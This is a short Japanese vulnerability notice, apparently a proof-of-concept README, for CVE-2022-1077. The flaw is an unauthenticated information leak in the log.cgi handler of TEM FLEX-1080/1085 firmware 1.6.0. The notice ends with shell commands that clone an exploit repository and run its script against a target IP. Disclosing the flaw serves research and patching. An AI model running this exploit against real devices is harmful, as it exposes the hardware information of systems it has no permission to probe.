TEM FLEX-1080 および FLEX-1085 バージョン 1.6.0 に脆弱性が見つかりました。問題ありと判定されています。この脆弱性は、Log Handler コンポーネントの log.cgi に影響します。直接リクエストを行うと、ハードウェア情報が漏洩します。攻撃はリモートから開始可能で、認証は一切必要ありません。

$ git clone https://github.com/Brosck/CVE-2022-1077.git
$ cd CVE-2022-1077
$ chmod +x cve-2022-1077.py
$ ./cve-2022-1077.py -u http://<IP>